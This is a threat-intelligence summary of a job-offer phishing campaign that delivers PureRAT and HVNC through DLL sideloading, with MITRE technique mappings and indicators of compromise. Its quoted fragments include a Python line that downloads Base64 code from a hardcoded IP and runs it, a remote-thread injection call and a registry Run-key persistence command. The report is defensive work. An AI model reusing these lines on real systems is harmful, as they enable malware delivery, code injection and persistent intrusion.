PureRAT: Attacker Now Using AI to Build Toolset

A Vietnamese-linked threat actor is using AI-assisted code to run a widespread phishing campaign that lures victims with job-offer themed messages and delivers payloads including PureRAT and HVNC. The attacker uses ZIP/RAR archives or cloud-hosted downloads, DLL sideloading, and persistence mechanisms to maintain access and may be selling compromised access to other actors. #PureRAT #HVNC

Keypoints

The campaign begins with phishing emails masquerading as job offers, delivered either with malicious ZIP/RAR attachments or links to cloud-hosted archives (Dropbox).
Malicious archives contain an executable that sideloads a malicious DLL (examples: oledlg.dll, msimg32.dll, version.dll, profapi.dll) which then runs batch or Python loaders.
Multiple scripts and Python loaders show strong signs of AI assistance: extensive comments, numbered steps, debug messages, and even emojis in code comments.
Final payloads observed include PureRAT and various HVNC implants; payloads are fetched from hardcoded IPs, GitLab, and other web hosts.
Persistence is established via registry Run keys (masquerading as ChromeUpdate) and sometimes scheduled tasks; attackers also rename and restore user documents to avoid suspicion.
Attribution evidence points to a Vietnamese operator or handle (use of Vietnamese comments, @dev.vn in passwords, and handles like kimxhwan/hwanxkiem), and motivation appears criminal (selling access) rather than espionage.

MITRE Techniques

[T1566.001 ] Spearphishing Attachment – Phishing emails delivering malicious ZIP/RAR attachments as job-offer lures (‘Attacks begin with phishing emails, usually masquerading as job offers.’).
[T1566.002 ] Spearphishing Link – Phishing emails containing links to cloud-hosted archives (Dropbox) used to deliver the malicious archive (‘recent examples seen by Symantec were hosted on Dropbox, with the phishing emails likely containing links and instructions to download the file.’).
[T1105 ] Ingress Tool Transfer – Payloads and loaders were retrieved from remote hosts, hardcoded IPs, GitLab and other web locations (‘payload was downloaded from a hardcoded IP address, in others it was downloaded from Gitlab’).
[T1574 ] Hijack Execution Flow (DLL side-loading) – Attackers sideloaded malicious DLLs via legitimate or renamed executables (Haihaisoft PDF Reader, old Microsoft Excel, renamed Foxit) to run malicious code (‘the executable used for sideloading was the Haihaisoft PDF Reader or an old version of Microsoft Excel’).
[T1055 ] Process Injection – Loaders use Windows API calls to allocate memory, write shellcode and create remote threads in suspended processes (InstallUtil.exe) to run payloads (‘CreateRemoteThread(process_info.hProcess, None, 0, addr, None, 0, None)’).
[T1218.011 ] Signed Binary Proxy Execution (InstallUtil.exe) – The Python loader creates a suspended InstallUtil.exe process and runs injected shellcode inside it (‘target_path = r”C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe” … Created suspended process PID’).
[T1547.001 ] Registry Run Keys / Startup Folder – Persistence is achieved by adding an entry to the current user Run key, masquerading as ChromeUpdate (‘reg add “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” … masquerading as ChromeUpdate’).
[T1053 ] Scheduled Task/Job – In some cases a scheduled task with benign-looking names (e.g., 123456.exe) is created to maintain persistence (‘In some cases, a scheduled task is created, with various names, such as 123456.exe.’).
[T1059.003 ] Command and Scripting Interpreter (Windows Command Shell) – Batch scripts are used to create hidden directories, rename files, extract archives with 7z and launch payloads (‘@echo off … ren “document.pdf” “huna.zip”‘).
[T1059.006 ] Command and Scripting Interpreter (Python) – Python loaders fetch Base64-encoded shellcode, decode it and perform Windows API calls to inject and execute payloads (‘import requests,base64;exec(base64.b64decode(requests.get(‘http://196.251.86.145/huna2′).text))’ and ‘shellcode_b64 = “BASE64SHELLCODE (too large to be put here)”‘).
[T1027 ] Obfuscated Files or Information – Payloads are transferred as Base64-encoded code fetched and decoded at runtime (‘fetches Base64 encoded code for the payload from the following URL: http://196.251.86[.]145/huna2’).
[T1036 ] Masquerading – Files and executables are renamed to appear benign (document.pdf/document.docx) and executables are given names like AdobeReader.exe to avoid detection (‘it then takes locally saved, innocuously named document.pdf and document.docx files and renames them to huna.zip and huna.exe’).

Indicators of Compromise

[File Hashes ] Malicious scripts and payloads – 06ad3e407d5370648350e64e11278fc974197ae26fa02457c5dea645d3936bc1 (batch script), 12a7f1aec5303e3e2eee59d9616b7e440f9c877d0db76620e8768c85433f3762 (sideloaded DLL), and 100+ other hashes listed in the report.
[IP Addresses ] Command-and-control / payload hosting – 196.251.86[.]145, 139.99.17[.]175, and 8 other IPs observed serving payloads or loaders.
[Domains / URLs ] Hosting and distribution points (cloud and web hosts) – https://dl.dropboxusercontent[.]com/… (multiple Dropbox-hosted archives), https://gitlab[.]com/kimxhwan/kimxhwan/-/raw/main/kimxhwan (GitLab raw payload), and many other URLs (dropbox, GitLab, ginten555333[.]com, dmca-wipo[.]com, etc.).
[File Names ] Malicious archives and executables used as lures and sideloaders – New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zip, Duolingo_Marketing_Skills_Assessment_oct.exe, adobereader.exe and huna.exe (renamed 7zip/WinRAR), and multiple other archive/executable names.
[DLL Names ] Sideloaded loader DLLs – oledlg.dll, msimg32.dll (used as sideloaded DLLs), and several other DLLs observed in sideloading chains.
[Registry / Persistence ] Startup persistence indicators – HKCUSoftwareMicrosoftWindowsCurrentVersionRun value ‘ChromeUpdate’ used to auto-run the Python interpreter (zvchost.exe) and scheduled task names such as ‘123456.exe’.